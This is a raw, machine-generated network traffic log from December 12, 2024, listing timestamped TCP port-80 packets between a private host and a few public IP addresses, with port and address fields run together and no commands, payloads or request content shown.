                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.221152067 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.221201897 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.221271038 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.221720934 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.222100019 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.222980022 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.223040104 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.223160028 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.223172903 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.223220110 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.224133015 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.225171089 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.225188017 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.225199938 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.225238085 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.225238085 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.226159096 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.226208925 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.226294041 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.227155924 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.228032112 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.228089094 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.228142023 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.229271889 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.229285002 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.229299068 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.229322910 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.229357004 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.230232954 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.230246067 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.230308056 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.231223106 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.231946945 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.231995106 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.232265949 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.232348919 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.232625961 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.233252048 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.233395100 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.233443975 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.234308004 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.235359907 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.235372066 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.235385895 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.235405922 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.235435963 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.236310005 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.237147093 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.237211943 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.237409115 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.237421989 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.237471104 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.238388062 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.238400936 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.238454103 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.239440918 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.239454985 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.239600897 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.240360022 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.240433931 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.240490913 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.241395950 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.241741896 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.241794109 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.242384911 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.242511988 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.242562056 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.243463039 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.243474960 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.243527889 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.244412899 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.244760990 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.244811058 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.245419979 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.306628942 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.384483099 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.384627104 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.384772062 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.384942055 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.385013103 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.385065079 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.385966063 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.386948109 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.386981010 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.387093067 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.387254953 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.387697935 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.388004065 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.388376951 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.388427973 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.389013052 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.389151096 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.389199972 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.390074968 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.390089035 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.390140057 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.391112089 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.391127110 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.391176939 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.392055035 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.392369032 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.392416954 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.393171072 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.394171000 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.394186020 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.394198895 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.394239902 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.394239902 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.395112991 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.395773888 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.396141052 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.396193027 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.396846056 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.396899939 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.397186041 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.397200108 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.397330999 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.398185968 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.398473024 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.398515940 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.399192095 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.399909019 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.399976015 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.400209904 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.400223970 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.400269032 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.401247978 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.401629925 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.401690960 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.402231932 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.402251005 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.402307034 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.403317928 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.403332949 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.403398037 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.404246092 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.404824018 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.404875040 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.405283928 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.405778885 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.405895948 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.406300068 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.407318115 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.407367945 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.407368898 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.407381058 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.407418966 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.408288002 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.409329891 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.409343958 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.409368038 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.409375906 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.409419060 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.410429955 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.410975933 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.411376953 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.411391973 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.411421061 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.411453009 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.412389994 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.412689924 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.412734985 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.413384914 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.414035082 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.414077044 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.414417982 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.414432049 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.414473057 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.415501118 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.415505886 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.415535927 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.416440010 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.416889906 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.416949034 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.417462111 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.417689085 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.418457985 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.418524981 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.419502974 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.419516087 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.419528961 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.419581890 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.420526028 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.420908928 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.420921087 CET8049970185.215.113.43192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.420953989 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.420974970 CET4997080192.168.2.10185.215.113.43
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.421529055 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.421576023 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.422529936 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.422569036 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.422653913 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.423532963 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.423587084 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.423926115 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.424571991 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.424612045 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.424695015 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.424725056 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.425669909 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.425682068 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.425714970 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.426656008 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.427974939 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.427988052 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.428035975 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.428036928 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.428848028 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.428886890 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.429269075 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.429301977 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.429653883 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.429666042 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.429697990 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.430625916 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.431662083 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.431674957 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.431699991 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.431720972 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.431744099 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.432641029 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.432791948 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.432828903 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.433677912 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.434060097 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.434097052 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.434731960 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.434901953 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.434950113 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.435658932 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.435720921 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.438452005 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.558244944 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.751684904 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.751954079 CET4997580192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.862247944 CET4997680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.872003078 CET8049975185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.872116089 CET4997580192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.872456074 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.872567892 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.876072884 CET4997580192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.982003927 CET8049976185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.982600927 CET4997680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.982600927 CET4997680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.996036053 CET8049975185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:52.102677107 CET8049976185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:53.217140913 CET8049975185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:53.217171907 CET8049975185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:53.217185020 CET8049975185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:53.217232943 CET4997580192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:53.217304945 CET8049975185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:53.217318058 CET8049975185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:53.217336893 CET8049975185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:53.217339993 CET4997580192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:53.217350006 CET8049975185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:53.217365980 CET4997580192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:53.217391968 CET4997580192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:53.217477083 CET8049975185.215.113.16192.168.2.10
